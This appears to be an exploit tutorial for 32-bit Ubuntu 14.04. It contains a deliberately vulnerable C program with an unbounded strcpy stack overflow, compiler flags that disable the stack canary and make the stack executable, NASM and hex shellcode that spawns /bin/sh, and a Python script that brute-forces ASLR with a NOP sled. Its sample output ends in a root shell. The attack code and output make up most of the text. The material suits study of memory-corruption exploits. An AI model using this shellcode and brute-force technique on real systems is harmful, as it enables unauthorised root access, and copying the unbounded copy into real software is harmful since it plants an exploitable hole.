/bin/sh shellcode, Ubuntu 14.04 32-bit + ASLR bruteforce
#shellcodeandaslrbruteforce.c
#Tested on : Ubuntu 14.04 32 bits
#Author : Pawan Lal [email protected]
*vim shellcodeandaslrbruteforce.c*
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
/*
 * Deliberately vulnerable sink (stack-based buffer overflow, CWE-121).
 *
 * Copies the caller-supplied string into a fixed 100-byte stack buffer with
 * an unbounded strcpy(); any argument longer than 99 bytes overwrites what
 * lies above buffer on the stack, including the saved frame pointer and the
 * return address. The bounded fix is
 *   snprintf(buffer, sizeof buffer, "%s", arg);
 * It is intentionally not applied here, because the exploit script further
 * down depends on this exact frame layout.
 *
 * arg: NUL-terminated string; its length is never checked.
 * Side effects: prints the string and then the address of buffer, which is
 * a stack-address leak (with ASLR on it differs on every run, see the
 * sample output below).
 */
void vuln (const char* arg){
char buffer[100];
strcpy(buffer, arg);   /* no bound: the overflow the rest of this page exploits */
printf("Hello %s\n", buffer);
printf("[+] buffer @ %p\n", buffer);   /* leaks where buffer landed on the stack */
}
/*
 * Entry point: requires exactly one command-line argument and passes it,
 * unchecked and unbounded, to vuln().
 *
 * Returns 0 after vuln() returns. On a usage error the message goes to
 * stdout and the process exits with status 1.
 */
int main(int argc, char **argv)
{
    if (argc == 2) {
        vuln(argv[1]);
        return 0;
    }
    printf("Usage: %s <buffer>\n", argv[0]);
    exit(1);
}
Build (Makefile or shell) with the command below:
usage : gcc -fno-stack-protector -z execstack shellcodeandaslrbruteforce.c -o shellcodeandaslrbruteforce (-fno-stack-protector removes the stack canary and -z execstack makes the stack executable; the exploit needs both mitigations off)
Turn on ASLR (1 = conservative randomisation of stack, mmap and shared-library bases; the distro default is 2, which also randomises the heap base):
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
#############################################################
*shellcode that executes '/bin/sh'*
global _start
section .text
; 25-byte i386 Linux execve("/bin//sh", ["/bin//sh"], NULL).
; Every instruction is chosen so the encoding contains no 0x00 byte (the hex
; string in the Python script below is exactly these bytes), which is what
; lets strcpy() in the target copy it whole. It only runs because the target
; was linked with an executable stack (-z execstack); NX alone would stop it.
_start:
xor eax, eax ;eax = 0 (mov eax, 0 would encode NUL bytes)
push eax ;NUL terminator of the path string
push 0x68732f2f ;"//sh" (bytes 2f 2f 73 68 in memory); the double slash pads the path to 8 bytes
push 0x6e69622f ;"/bin" -> the stack now holds "/bin//sh\0"
mov ebx, esp ;ebx = pointer to "/bin//sh" = execve filename (1st argument)
push eax ;NULL: terminates argv and doubles as the empty envp
mov edx, esp ;edx = envp = pointer to that NULL (3rd argument)
push ebx ;argv[0] = pointer to "/bin//sh"
mov ecx, esp ;ecx = argv = {filename, NULL} (2nd argument)
mov al, 11 ;syscall number 11 = execve on 32-bit Linux (al only, again to avoid NULs)
int 0x80 ;execve syscall
################################################################
*Final exploit using /bin/sh shellcode and ASLR bruteforce*
*vim shellcodeandaslrbruteforce.py*
#!/usr/bin/python
import struct, sys, time
from subprocess import PIPE, Popen
# exec /bin/sh: the 25-byte i386 Linux execve payload assembled from the NASM
# listing above. It contains no NUL byte, so strcpy() in the target copies it
# whole; it needs an executable stack (-z execstack) to run at all.
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

# Frame layout of vuln() in the C source above (no canary: -fno-stack-protector).
bufsize = 100  # sizeof buffer in vuln()
offset = 12  # bytes from the end of buffer to the saved return address (alignment padding + saved ebp)
nopsize = 4096  # NOP sled length: the wider the sled, the less exact the address guess has to be
def prep_buffer(addr_buffer):
    """Build the argv[1] payload for one attempt at a guessed stack address.

    Layout, low to high: filler covering buffer[] plus the gap up to the saved
    return address, the new return address, a NOP sled, then the shellcode.
    The return address is addr_buffer + bufsize + offset + 4, i.e. the byte
    right after the return-address slot: the start of the sled, provided
    buffer[] really starts at addr_buffer. With ASLR on that is only true by
    chance, which is why the caller retries the same payload in a loop.

    addr_buffer: guessed absolute address of buffer[] in the target process.
    Returns the payload as a str (Python 2: struct.pack returns str; on
    Python 3 it returns bytes and the concatenation would raise TypeError).
    Reads the module-level bufsize, offset, nopsize and shellcode.
    """
    filler = "A" * (bufsize + offset)
    ret_addr = struct.pack("<I", addr_buffer + bufsize + offset + 4)  # little-endian, i386
    nop_sled = "\x90" * nopsize
    return filler + ret_addr + nop_sled + shellcode
def brute_aslr(buf):
    """Run one attempt: start ./bof with buf as its single argument and block
    until the child exits.

    stdout/stderr are inherited, so the target's own "[+] buffer @" line is
    printed inline. The exit status is not inspected: when the guess misses,
    the child presumably crashes and this just returns so the caller can try
    again. Note the binary is launched as ./bof, whereas the gcc line above
    produces ./shellcodeandaslrbruteforce.
    """
    child = Popen(['./bof', buf])
    child.wait()
if __name__ == '__main__':
    # One fixed guess for the address of buffer[]. ASLR relocates the stack on
    # every execution, so the same payload is launched over and over until the
    # guess happens to fall inside the 4096-byte NOP sled. Nothing checks for
    # success: the loop never stops on its own (each iteration blocks until
    # the child exits, so a spawned shell holds the loop until it is closed).
    addr_buffer = 0xbf92b39c  # randomly decided
    payload = prep_buffer(addr_buffer)
    attempt = 0
    while True:
        print(attempt)  # single-argument form: identical output on Python 2
        brute_aslr(payload)
        attempt += 1
##################################################################
root@ubuntu:~/bof/shellcodeandaslrbruteforce
$ python shellcodeandaslrbruteforce.py
(...)
(...)
[+] buffer @ 0xbfc2bc0c
996
(... snippet)
[+] buffer @ 0xbfb9930c
997
(... snippet)
[+] buffer @ 0xbf92721c
998
(... snippet)
[+] buffer @ 0xbf92a26c
# whoami
root